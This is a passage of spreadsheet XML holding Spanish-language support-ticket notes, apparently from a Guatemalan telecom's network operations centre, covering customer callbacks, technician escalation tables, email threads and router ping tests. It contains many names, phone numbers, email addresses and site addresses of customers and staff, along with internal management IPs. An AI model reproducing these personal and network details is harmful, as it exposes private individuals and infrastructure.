  </si>
  <si>
    <t>F4584984</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. ENCARGADO ELIAZAR GUILLE 66322200 INFORMA QUE NO HAY ENERGIA EN SITIO REMOTO, SE PROCEDE AL CIERRE DEL INCIDENTE ID: 3001452232.</t>
  </si>
  <si>
    <t>F4584989</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE SAIDA BLANCA, QUIEN ESTA UBICANDO LOS EQUIPOS.
3001459789, 38850899
COLA:
NOMBRE: A: 38850899
NÚMERO: 55280199
DURACIÓN: 0:00:39
ESTADO: CONECTADA
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 31/05/2022 17:05:55</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SAIDA BLANCA 38850899 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001591286</t>
  </si>
  <si>
    <t>-* SE HABLA CON DAVID MELARA (CLIENTE) INFORMA QUE YA CUENTA CON LA FOTOGRAFIA DEL EQUIPO, SE CONSULTA CON HUGO SOTO, SOLICITA SE COMPARTA LA INFORMACION AL WSP 41289834 , INFORMA QUE LO ENVIARÁ -*
-*</t>
  </si>
  <si>
    <t>F4585002</t>
  </si>
  <si>
    <t xml:space="preserve">	WO OPEN                                			5:56
1/5	ALICIA TOBAR	78404534	2 HORAS	7:56:00
2/5	ADRIAN GUEVARA	78554469	3 HORAS	8:56:00
3/5	HUMBERTO CHIQUILLO	78523419	4 HORAS	9:56:00
4/5	OSCAR HERNANDEZ 	7855-0164	5 HORAS	9:56:00
5/5	JUAN RIVAS 	7606-7202	7 HORAS	11:56:00</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JULIO 76159402 - 76159402  NO RESPONDE, SE INTENTARA LUEGO
-ID 3001462085 - 3001462208 - 3001462667</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JULIO 25233110 MENCIONA QUE PERSISTE EL INCONVENIENTE, SE DEJA EN CONFERENCIA CON GESTOR
-ID 3001681602</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PR 72780169 PERO NO RESPONDE
-ID 3001681310</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JULIO 25233110 MENCIONA QUE PERSISTE EL INCONVENIENTE PERO SOLICITA SE LLAME AL NUMERO 72780169
-ID 3001678571</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JULIO AL 25233110 NO RESPONDE || SE INTENTARA LUEGO **
ID 3001659401 - 3001659503
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JULIO 76159402 SOLICITA QUE SE LE LLAME AL NUMERO 25233110 YA QUE DONDE ESTA NO TIENE MUCHA SEÑAL **
ID 3001658788
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JULIO 76159402  MENCIONA QUE NO SE ENCUENTRA EN PR POR LO QUE SOLICITA LLAMADA PARA LAS 13:30 HRS
-ID 3001540396</t>
  </si>
  <si>
    <t>TECNICOS EN SITIO PLEX REPARANDO FIBRA 77454185  ESTIMAN LLEGA EN 30 MINUTOS</t>
  </si>
  <si>
    <t>F4585007</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE AMILCAR  PERO NO RESPONDE, SE NECESITA VALIDAR EL SERVICIO, NO EXISTIO INTERVENCIÓN DE CLARO, AYER FUE PROBLEMA DE LA PBX.
3001562014
COLA:
NOMBRE: A: 56956068
NÚMERO: 56956068
DURACIÓN: 0:00:03
ESTADO: MARCANDO
DETALLES: 56956068
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 1/06/2022 09:15:49
3001562176
COLA:
NOMBRE: A: 56956068
NÚMERO: 56956068
DURACIÓN: 0:00:02
ESTADO: MARCANDO
DETALLES: 56956068
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 1/06/2022 09:16:22</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE  AMILCAR RIVERA 56956068 QUIEN ESTA VALIDANDO, LLAMADAS AL 1717 YA COMPELTAN, ESTE DIGI4 SE RESUELVE EN 24203060. SOLICITA SE DEJE EN MONITOREO PARA MAÑANA  01/06 A LAS 9 HORAS. ESTAN REVISANDO TEMA DE SU PBX. CLIENTE CORRIGIO CONFIGURACIÓN Y RESTABLECE SERVICIO.
3001460144
COLA:
NOMBRE: A: 56956068
NÚMERO: 56956068
DURACIÓN: 0:00:01
ESTADO: MARCANDO
DETALLES: 56956068
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 31/05/2022 17:06:34</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE AMILCAR RIVERA 56956068 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001564895 - 3001565446</t>
  </si>
  <si>
    <t>F4585008</t>
  </si>
  <si>
    <t xml:space="preserve"> LIDER JUAN MANUEL, COMENTA QUE EL REPORTE QUE TIENE EL CLIENTE E ES QUE CLIENTE PERCIBE EN LLAMADAS TODNO DE DESCONEXION,  CLIENTE SERGIO VALLEJO ESTA REVISANDO SU CONFIGURACION DE PBX, MANTENEMOS CASO EN PC HASTA QUE CLIENTE DEVUELVA LA LLAMADA, SEGUN INSTRUCCIONES QUE SE TIENEN DE PARTE DE CLIEINTE Y LIDER ##</t>
  </si>
  <si>
    <t>##CLIENTE REALIZA PRUEBAS ## CLIENTE CORRIGE CONFIGURACION DE SU EQUIPO PBX ## SE MANTENDRA EN PC POR SI SEA NECESARIO ESCALAR CASO  A CUALQUIER AREA, YA SEA A CX O PLEX. ## SE VALDIARA MAÑANA A LAS9AM ##</t>
  </si>
  <si>
    <t>F4585011</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 22437253 CONTESTA EL SEÑOR VICTOR NUÑEZ CONFIRMA SERVICIO ESTABLE **
AUTORIZA CIERRE DE TICKET **
ID 3001534200
**</t>
  </si>
  <si>
    <t>F4585053</t>
  </si>
  <si>
    <t>**SE LE LLAMA A CLIENTE DENNIS CONDE 2338 6801 CONTESTA UNA SEÑORITA LA CUAL INDICA QUE LA EXT.: 32313 NO EXISTE Y COMUNICA AL AREA ENCARGADA PERO NO SE ESCUCHA NADA  SE INTENTARA LUEGO **
ID 3001534583
**</t>
  </si>
  <si>
    <t>F4585064</t>
  </si>
  <si>
    <t>SE TIENE EN LÍNEA A JONATHAN SOR/CLIENTE PARA QUE DETALLES DE LO REPORTADO; SE PIDE APOYO A GESTIÓN N1 VÍA SKYPE, VÍA TELEFÓNICA APOYA YENSI CALGUA/GESTOR N1; EN TRIPARTITA ÉSTOS, ESTÁN GESTIONANDO EL CASO, EN ESPERA DE LO QUE DETERMINEN.</t>
  </si>
  <si>
    <t>SE FINALIZA LLAMADA CON CL A QUIEN SE LE EXPONE Y BRINDA DETALLES A REALIZAR COMENTA  CUALQUIER VALIDACION SE REALICE EL DIA DE MAÑANA
4324- 7230 &gt;&gt;&gt; CARLOS CHENG A PARTIR DE LAS 8:00 HORAS-</t>
  </si>
  <si>
    <t>F4585074</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 22399723 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001622209</t>
  </si>
  <si>
    <t>F4585076</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 2243-7253 CONTESTA EL SEÑOR VICTOR NUÑEZ CONFIRMA SERVICIO UP Y AUTORIZA CIERRE DEL TICKET **
ID 3001535720
**</t>
  </si>
  <si>
    <t xml:space="preserve">
DE: ALEJANDRO NAVARRO FERNANDEZ &lt;ALEJANDRO.NAVARRO@CLARO.COM.GT&gt;
ENVIADO: MARTES, 31 DE MAYO DE 2022 18:17
PARA: CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; GERALD TORRES (VENDOR) &lt;GERALD.TORRES@WALMART.COM&gt;; NOE PEREZ (VENDOR) &lt;NOE.PEREZ1@WALMART.COM&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; STEVEN MARQUEZ (VENDOR) &lt;STEVEN.MARQUEZ@WALMART.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: ENLACE CAÍDO DE LA UNION LARREYNAGA ID: 467331
BUENAS TARDES ESTIMADOS(A):
COMO PARTE DEL SEGUIMIENTO AL CASO SOLICITAMOS DE SU APOYO PARA VALIDAR SI AÚN PERSISTEN LOS INCONVENIENTES ANTES PLANTEADOS. SE CAMBIA ESTADO DE NEGOCIACIÓN EN LA INTERFAZ DEL EQUIPO ACCESO HACIA CLIENTE EN NODO Y SE DEJA FORZADA A 100 FULL DÚPLEX. DE ANTEMANO GRACIAS. SALUDOS CORDIALES
&lt;AMANNICPN1C1D02A01EID1&gt;PING -C 500 -S 1450 -M 40 -B -VPN-INSTANCE MPLS_CSU2 10.15.31.235
  PING 10.15.31.235: 1450  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.15.31.235 PING STATISTICS ---
    500 PACKET(S) TRANSMITTED
    500 PACKET(S) RECEIVED
    0.00% PACKET LOSS</t>
  </si>
  <si>
    <t>F4585081</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE ANIBAL GONZALEZ CLIENTE YA NO CONTESTO. SE CONTINURAN LAS PRUEBAS EL DIA DE MAÑANA. EN HORARIO HABIL.
3001503513, 3001503668, 3001503744
COLA:
NOMBRE: A: 44990369
NÚMERO: 55280199
DURACIÓN: 0:01:02
ESTADO: CONECTADA
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 31/05/2022 18:46:04</t>
  </si>
  <si>
    <t>SE HABLO CON EL CLIENTE ANIBAL GOMEZ QUIEN INDICA QUE EL VA A DAR SEGUIMIENTO CON EL PROVEEDOR DE TIGO.
SOLICITA EL CIERRE DE TICKET.
3001518680
COLA:
NOMBRE: A: 44990369
NÚMERO: 011 50244990369
DURACIÓN: 0:00:57
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: +50244990369
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 31/05/2022 19:30:09</t>
  </si>
  <si>
    <t>CLIENTE ANIBAL AL NUMERO 1720 EXT 301690 INDICÓ QUE LLAMADAS DESDE EL GDN: 24985858 SOLO LE COMPLETAN A NUMEROS CLARO PERO NO A NUMEROS TIGO.</t>
  </si>
  <si>
    <t>F4585103</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CL
RE: SOLICITUD DE SOPORTE ::: ID LOCAL 4690063 ::: TICKET CNOC IMBBL004074 ::: " LINK DOWN"</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174 5290 CONTESTAN PERO DEJAN LLAMADA EN ESPERA Y NO LA RETOMAN SE INTENTARA LUEGO **
ID 3001557109
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174 5290 CONTESTAN PERO DEJAN LLAMADA EN ESPERA Y NO LA RETOMAN SE INTENTARA LUEGO **
ID 3001536085
**</t>
  </si>
  <si>
    <t>F4585120</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FREDY GARCIA AL 55550306 NO RESPONDE ENVIA A BUZON || SE INTENTARA LUEGO PARA CONFIRMAR HORA DE VISITA **
ID 3001798788
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FREDY GARCIA  AL 55550306 NO RESPONDE ENVIA A BUZON || SE INTENTARA LUEGO **
ID 1001469158
**</t>
  </si>
  <si>
    <t xml:space="preserve"> SE LLAMA A CLIENTE FREDY GARCIA 55550306 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001501136 - 1001501620</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FREDY GARCIA AL 55550306 INDICA QUE CONSULTARA LA HORA PARA LA VISITA Y SOLICITA QUE SE LE LLAME A LAS 9:0 AM
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FREDY GARCIA AL 55550306 || SE CONTACTA A CLIENTE Y SE DEJA EN LINEA
CON GESTOR **
ID 3001536776
**</t>
  </si>
  <si>
    <t>SE LLAMA AL CL FREDY GARCÍA AL 55550306 ID 3001584959 ATIENDE Y SE LE BRINDA LA INFORMACIÓN EN SEGUIMIENTO DEL TICKET Y COMENTA QUE EL ROUTER ES DONDE INGRESA TODAS LAS SUCURSALES POR TAL RAZÓN COMO EL ERROR SUCEDE EN LAS MAÑANA ACTUALMENTE ESTA OPERATIVO Y SOLICITA QUE SE VISITE A LAS 17:00 HORAS SE CONTACTA CON EL GESTOR A CARGO GERSON.AJPACAJA AL 8126 ID 3001585642 INGRESA A VARIOS GESTORES Y NO RESPONDEN QUEDA EL ULTIMO REGISTRO CON DARWIN  ESPAÑA Y NO RESPONDE SE LIBERA Y SE VUELVE A CONTACTAR AL 8126 ID 3001586113 RESPONDE JOSE OCHOA  QUIEN BRINDARA EL SOPORTE SE DEJA EN LINEA CON EL CL.</t>
  </si>
  <si>
    <t>F4585134</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 56938699 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001586241</t>
  </si>
  <si>
    <t>F4585135</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSUE PEREZ AL 1755 EXT. 60009 NO RESPONDE, SE INTENTARA LUEGO **
ID 3001539045
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSUE PEREZ AL 1755 EXT. 60009 NO RESPONDE, SE INTENTARA LUEGO **
ID 3001558684
**</t>
  </si>
  <si>
    <t>F4585141</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JEFE DE AGENCIA 24139090 DA TONO DE DESCONECTADO NO PERMITE MARCAR EXT. || SE INTENTARA LUEGO **
ID 3001559599 - 3001559739
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JEFE DE AGENCIA 24139090 EXT  82330 NO RESPONDE || SE INTENTARA LUEGO **
ID 3001539563
**</t>
  </si>
  <si>
    <t>F4585150</t>
  </si>
  <si>
    <t>SE LLAMA AL CL EDGAR JESUS HERNANDEZ VAZQUEZ AL +52 55 5174 5290 ID 3001639200 ATIENDE  LAURA RODRIGUEZ Y SE LE BRINDA LA INFORMACIÓN EN SEGUIMIENTO DEL TICKET Y COMENTA QUE YA ESTA CERRADO DE SU LADO Y EN EFECTO EL SERVICIO OPERATIVO Y CONFIRMA EL CIERRE DEL TICKET. SE NOTIFICA AL GESTOR FRANCISCO.QUEZADA VÍA SKYPE</t>
  </si>
  <si>
    <t>F4585152</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MAXIMINO ARGUETA HERNANDEZ AL 22528818 INDICA QUE AUN NO TIENE ENLACE NI LO DEJA MONITOREAR EL ENLACE || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE   **
ID 3001560552
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MAXIMINO ARGUETA HERNANDEZ AL 22528818 - 78881568 || NO RESPONDE NINGUN NUMERO || SE INTENTARA LUEGO **
ID 3001550977 - 3001551552
**</t>
  </si>
  <si>
    <t>F4585210</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EVER GALDAMEZ 42848126 MENCIONA QUE DESDE AYER NO CUENTAN CON ENERGIA EN PR
-ID 3001582171</t>
  </si>
  <si>
    <t>SE LLAMÓ/HABLÓ CON EVER GÁLDAMEZ/PR 42848126 INDICA QUE DESDE AYER A LAS 16:00 HORAS NO CUENTAN CON ENERGÍA, EN ESTOS CASOS ASEGURA QUE PASAN HASTA 3 DÍAS SIN SERVICIO DEBIDO A LO DICHO.
SE LLAMÓ/HABLÓ CON CARLOS SANTISTEBAN/CENTRAL 66209720 EXT 113021 SE LE INDICA LO DICHO POR PR, AUTORIZA CIERRE DEL TICKET.</t>
  </si>
  <si>
    <t>F4585272</t>
  </si>
  <si>
    <t>JUAN CARLOS RODRIGUEZ 45240369 (CLIENTE) INFORMA QUE DE MOMENTO TODO OK,  YA LLEVAN SUFICIENTE TIEMPO ESTABLES POR LO QUE AUTORIZA CIERRE DE TICKET, SE HABLA CON HUGO SIMON (GESTOR) INFORMA QUE LA TAREA AUN ESTA ABIERTA Y REGULARMENTE CLIENTE TIENE FALLA EN LA NOCHE-MADRUGADA, POR LO QUE SE MANTENDRÁ AUN ABIERTO Y DE NO HABER FALLA SE CERRARÁ A INICIOS DE JULIO -*
-*</t>
  </si>
  <si>
    <t>F4585316</t>
  </si>
  <si>
    <t>** SE ESCALA CASO CON JUAN MANUEL CARDONA (TL) COLOCA EN TRIPARTITA A BYRON GOMEZ (GESTOR) PARA VERIFICACIONES Y/O PRUEBAS -*
-*</t>
  </si>
  <si>
    <t>F4585427</t>
  </si>
  <si>
    <t>***---  SE ENVÍA CORREO A CL SOLICITANDO CONTACTOS EN SITIO --**
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: MIÉRCOLES, 1 DE JUNIO DE 2022 04:48
PARA: STEVEN MARQUEZ (VENDOR) &lt;STEVEN.MARQUEZ@WALMART.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;; CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: ENLACE CAÍDO DE PALI CIUDAD COLON ID: CONTR0001541963OC
ESTIMADO SR. MARQUEZ.
                CONTINUANDO CON EL SEGUIMIENTO, PERSONAL A CARGO NOS INDICA QUE ES NECESARIO REALIZAR PRUEBAS DE PRIMER NIVEL.
PODRÍA POYARNOS COMPARTIENDO CONTACTOS EN SITIO Y EL HORARIO PARA PODER REALIZAR DICHAS PRUEBAS.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.</t>
  </si>
  <si>
    <t>F4585500</t>
  </si>
  <si>
    <t>SE LLAM A CLIENTE JONY MORALES 59665690 - 59665642 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001701061 - 3001701288</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOHN MORALES AL 5966 5642 CLIENTE NO RESPONDE || SE INTENTARA LUEGO **
ID 3001552804 - 3001553132
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOHN MORALES AL 5966 5642 NO RESPONDE, SE INTENTARA LUEGO **
ID 3001601435
**</t>
  </si>
  <si>
    <t>F4585565</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 2243-7253 CONTESTA EL SERÑOR GERALD TORRES  CONFIRMA SERVICIO ESTABLE Y
AUTORIZA CIERRE DE TICKET **
ID 3001621608
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 2243-7253 OPERADORA INDICA QUE LOS AGENTES ESTAN OCUPADOS || SE INTENTARA LUEGO **
ID 3001600616
**</t>
  </si>
  <si>
    <t>F4585609</t>
  </si>
  <si>
    <t>SE LLAMO A PERSONAL DE 5B ATENDIO MOISES PACAJO INDICA QUE CAJERO SE ENCUENTRA DENTRO DE UNA  AGENCIA LA CUAL HA CULMINADO JORNADA LABORAR EL DIA DE HOY, POR LA HORA RECOMIENDA QUE SE LLAME A 5B EL DIA DE MAÑANA A PARTIR DE LAS 8 AM PARA QUE ELLOS REALICEN EL PROCESO DE VERIFICACACIÓN CON AGENCIA BANRURAL, LOG VIA CIC.
RESULTADO: LLAMADA HECHA
NOMBRE: 24207212
NÚMERO: 24207212
INICIO: HOY, 17:19
FIN: HOY, 17:22
DURACIÓN: 3:39
ID DE LLAMADA: 3001734700</t>
  </si>
  <si>
    <t>F4585613</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BYRON GOMEZ AL 77401515 SE SOLICITAN DATOS DE VISITA Y BRINDA LOS SIGUIENTES **
HORARIO DE ATENCION: 7:00 A 18:00 HRS
GESTION DE PERMISOS: SOLO IDENTIFICADOS ENVIAR CORREO CON DATOS DEL PERSONAL TECNICO Y DATOS DEL VEHICULO EN EL QUE LLEGARAN .
DIRECCION: FINCA LA SIERRA ESCUINTLA
ATENDERA EN SITIO: MARDOQUEO BONILLA
-ID 3001545152
**</t>
  </si>
  <si>
    <t>F4585621</t>
  </si>
  <si>
    <t>CAIDA TOTAL
NO SE VE CONEXION EN LA UM
TECNICO DE CAMPO IDENTIFICA FALSO EN LA FUENTE DE NODO
SE CONECTA BIEN Y ENLACE RESSTABLECE</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WALTER ANIBAL REYES AL 45787911 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 3001652159
**</t>
  </si>
  <si>
    <t>F4585648</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EDWIN HERRERA 89904025 CLIENTE MOLESTO INDICA QUE EL ROUTER ES EL QUE NO SIRVE SOLICITA VISITA TEC NO APOYA EN LLAMADA SE SOLICITAN LOS DATOS PARA LA VISITA **
HORARIO DE ATENCION: 8:00 A 17:00 HRS
GESTION DE PERMISOS: SOLO IDENTIFICADOS
DIRECCION: COLONIA PALMIRA AVENIDA REPUBLICA DE PANAMA 20 MTS AL OESTE REDONDEL BENITO JUAREZ CONTIGUO AL HOTEL EL EDEN
ATENDERA EN SITIO: BRYAN ARTICA.
ID 3001547618
**</t>
  </si>
  <si>
    <t>F4585654</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MAURICIO ALEMAN 25662020 EXT. 5300 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001560699</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  MAURICIO ALEMAN 25662020 EXT. 5300 MENCIONA QUE ESTAN REALIZANDO PRUEBAS CON PR POR LO QUE SOLICITA LLAMAD EN 15 MIN
-ID 3001594989</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 25662020  EXT. 5300 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001732900</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 25662020 EXT. 5300 NO SE LOGRA LA COMUNICACION, SE INTENTARA LUEGO
-ID 3001676843</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 25662020  EXT. 5300 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001787704</t>
  </si>
  <si>
    <t>SE LAMA A CLIENTE 25662020 EXT. 5300 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001610281</t>
  </si>
  <si>
    <t>F4585664</t>
  </si>
  <si>
    <t>SE CONTACTA JULIO MEDINA DEL 59511551 ID 3001623814 PARA EL SEGUIMIENTO DEL TICKET Y COMENTA QUE AUN SIGUE LA AFECTACIÓN POR LO QUE SE TRASFIERE CON EL CNOC Y BRINDA EL SOPORTE JHONSER ESCOBAR SE DEJA CON EL CL EN LINEA</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JULIO MEDINA 59511551 MENCIONA QUE PERSISTE EL INCONVENIENTE, SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 3001562284</t>
  </si>
  <si>
    <t>F4585670</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LUIS LEMUS AL 21211912 INDICA QUE AUN NO LOGRA INGRESAR  QUE NO TIENE CONECTIVIDAD DE UN PUNTO A OTRO || SE NOTIFICA A GESTOR **
ID 30015663542
**</t>
  </si>
  <si>
    <t>F4585682</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GERARDO GONZÁLEZ 31900598 MENCIONA QUE YA OBSERVA EL SERVICIO OPERATIVO Y ESTABLE
-ID 3001567282</t>
  </si>
  <si>
    <t>F4585685</t>
  </si>
  <si>
    <t>F4585693</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE PARA VALIDAR ESTADO DEL SERVICIO, INDICA QUE ESTA OPERATIVO PERO SOLICITA MONITOREO POR 24 HORAS, SE CAMBIA DE ETAPA PARA PARA 02/06/2022 A LAS 11:00 HORAS.
3001598302
COLA:
NOMBRE: A: 78321094
NÚMERO: 78321094
DURACIÓN: 0:03:20
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 78321094
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 1/06/2022 11:00:51</t>
  </si>
  <si>
    <t>SE  CONTACTA A CLIENTE, WALTER ANIBAL REYES  SE LE NOTIFICA DEL DIAGNOSITICO ACTUAL
3001576812
COLA:
NOMBRE: A: 45787911
NÚMERO: 45787911
DURACIÓN: 0:02:47
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 45787911
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 1/06/2022 10:02:19</t>
  </si>
  <si>
    <t>***--- CL AUTORIZA CIERRE DE TICKET --**
DE: WALTER ANIBAL REYES [MAILTO:WALTER.REYES@SOMOSCMI.COM]
ENVIADO EL: JUEVES, 2 DE JUNIO DE 2022 02:41
PARA: EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;
CC: HELPDESK. &lt;HELPDESK@CAMPERO.COM&gt;; NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;
ASUNTO: RE: C634 - CAÍDO, ENLACE DE DATOS CLARO 38300513, 671900172
BUEN DÍA, GRACIAS POR EL APOYO, CERRAR TICKET.
SALUDOS,</t>
  </si>
  <si>
    <t>F4585700</t>
  </si>
  <si>
    <t>TABLA DE ESCALAMIENTO PLANTA EXTERNA REGION CENTRAL				07:0
	WO OPEN                        		12	9:58
1/4	MIGUEL ANGEL CALDERON	58261558	2 HORAS	11:58:00
2/4	MIGUEL ANGEL CALDERON	58261558	3 HORAS	12:58:00
3/4	RENE AGUSTIN	58261183	5 HORAS	13:58:00
4/4	RODOLFO MORALES	58261609	6 HORAS	15:58:00</t>
  </si>
  <si>
    <t>TECNICO HACE CAMBIO DE ETX X CTC, SE VE QUE LEVANTA LINK DE FIBRA
51733906</t>
  </si>
  <si>
    <t xml:space="preserve">	WO OPEN                        	58265358		10:07
1/4	ALEJANDRO URIZAR	58265358	30 MIN	10:37
2/4	GUSTAVO ADOLFO SIERRA	58261212	1 HORA	11:07:00
3/4	HECTOR FLORES	58269494	2 HORAS	12:07:00
4/4	RODOLFO MORALES	58261609	3 HORAS	13:07:00</t>
  </si>
  <si>
    <t>EN GESTION CON TECNICO HACIENDO PRUEBAS DE SERVICIO</t>
  </si>
  <si>
    <t xml:space="preserve"> IP DE GESTION 10.87.186.54
MASCARA /26  255.255.255.192
10.87.186.1
VLAN 115</t>
  </si>
  <si>
    <t>SE REALIZAN PRUEBAS SE DESCARTARA PATCHCORD DAÑADO TECNICO SE ENCUENTRA BUSCANDO UNO</t>
  </si>
  <si>
    <t>&lt;OBARGTBAN1T1D04A03EIM3&gt;PING -C 1500 -M 30 -B -VPN-INSTANCE CAMPERO_XT 10.103.83.139
  PING 10.103.83.139: 56  DATA BYTES, PRESS CTRL_C TO BREAK
